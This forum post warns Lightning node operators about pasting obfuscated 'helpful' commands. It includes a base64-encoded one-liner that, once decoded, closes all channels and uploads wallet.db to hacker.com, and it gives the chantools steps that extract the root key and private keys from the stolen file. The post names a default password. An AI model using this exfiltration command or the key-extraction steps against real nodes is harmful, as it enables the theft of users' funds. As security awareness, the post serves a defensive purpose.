Hi I just read a lot of posts of people using ssh to execute “helpful” commands, most of them are for troubleshooting but be careful, your “wallet.db” is accessible via ssh and the default password is “moneyprintergobrrr”. This db file is very important, as critical as your seed phrase and I will explain why with an example:
Here a example on how someone can “hack” your node funds:
- We are going to copy the wallet.db, using a obfuscated “helpful” command
$(echo "bG5jbGkgY2xvc2VhbGxjaGFubmVscztjdXJsICAtRiAiaW1hZ2U9QGxuZC9kYXRhL2NoYWluL2JpdGNvaW4vbWFpbm5ldC93YWxsZXQuZGIiIGhhY2tlci5jb20vdXBsb2FkCg==" | base64 --decode)
What looks like an easy copy & paste comand is in fact a critical command that can compromise your node, if we decode the code above we get this:
lncli closeallchannels;curl -F "image=@lnd/data/chain/bitcoin/mainnet/wallet.db" hacker.com/upload
The command closes all your channels at once and uploads your wallet.db to the hacker temp server.
- After they closed your channels and got your wallet.db they can move your on-chain funds. To do this they can use a tool like chantools, https://github.com/guggero/chantools
to get your rootkey
./chantool walletinfo --walletdb=wallet.db --withrootkey (password “moneyprintergobrrr”)
then
./chantool genimportscript --format=electrum --rootkey=<key>
Finally they can use the output script with all private keys to import it in Electrum and get all your coins.
This wallet.db file is useful to move stuck coins or for Node recovery, but keep your node safe and avoid executing commands you don’t know.